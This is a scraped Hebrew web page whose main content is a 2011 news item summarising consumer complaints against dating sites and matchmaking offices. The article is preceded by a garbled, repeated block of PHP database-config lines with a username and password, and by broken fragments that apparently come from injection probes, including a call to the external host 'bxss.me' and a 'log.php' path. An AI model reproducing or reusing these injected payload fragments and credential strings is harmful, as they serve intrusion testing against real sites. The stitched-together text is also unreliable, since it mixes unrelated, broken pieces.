$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> לפי ארגון אמון הציבור: תלונות רבות נגד אתרי היכרויות ומשרדי שידוכים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מחפשים זוגיות מתלוננים כנגד אתרי היכרויות ומשרדי שידוכים

תאריך: 15/02/2011 15:11   מחבר: מערכת האתר

לפי דוח ארגון "אמון הציבור", שפורסם ב"גלובס" בחודש פברואר 2011 עולה דפוס התנהגות לקוי של אתרי היכרויות. מזרם התלונות שהגיע לארגון מתקבלת רשימה של תלונות מייצגות כמפורט להלן:

אין החזר כספי

אתרי היכרויות הוקמו לפי קהלי יעד ספציפיים ובהם: גיל הזהב, נכים, דתיים, הומולסביים וכדומה. גובה התשלום נע מ 10 ש"ח לחודש להתנסות ועד 120 ש"ח למנוי קבוע. חרף העובדה שהלקוחות לא מרוצים מהשירות והם מבקשים לבטל העסקה וההתקשרות עם האתרים, מפעילי האתרים מסרבים להחזיר את הכספים ששולמו תוך הסתמכות על חוזים כובלים שמגינים עליהם. לפי הוראות החוק, בעסקה מתמשכת מסוג זה על בעל העסק לגלות את פרטי העסקה, מועד סיומה ותשלום קנס יציאה. גם בעסקה עם אתרי היכרויות ניתן לבטל העסקה תוך 14 יום תוך מתן הודעה בכתב.

הבטחות שווא

לקוחות רבים התלוננו נגד משרדי שידוכים שהציעו מועמדים לשידוך שלא היו מתאימים כלל לדרישות הלקוח. אחרים התלוננו כי לא הוצעו להם כלל מועמדים. על רקע זה ביקשו לבטל העסקה ונדחו על ידי מפעילי משרד השידוכים.

חוזים כובלים

לאחר תום תקופת ההתחייבות, גילו הלקוחות כי כבלו אותם בחוזה חדש וללא ידיעתם. בחלק מהמקרים הארכת החוזה נעשתה באותם תנאים ובאחרים בתנאים חדשים. האתרים מפרסמים כי החוזה יחודש אוטומטית אלא אם כן הצרכן יודיע על ביטולו. בתי העסק לא מטריחים עצמם ליידע את הלקוחות על התקרבות מועד סיום החוזה, כמתחייב בחוק, מה שגורם לחיובי שווא ולטרטור הלקוחות.

שירות לקוי

צרכנים התלוננו כי קשה מאד ליצור קשר עם אנשי השירות לעומת הקלות לתקשר עם אנשי המכירות להם אינטרס מובהק למכור שירותים. אם כבר נוצר קשר עם נציג שירות לא מתקבל מענה מספק, הנציגים מתחמקים ולא נותנים את התשובות המקצועיות. מספרי הטלפון של האתרים אל מפורסמים ובמקרה של בקשה להחזר כספי למשל לא ניתן להשיג את מנהלי האתר ולכן צריכים לפנות דרך חברת כרטיסי האשראי.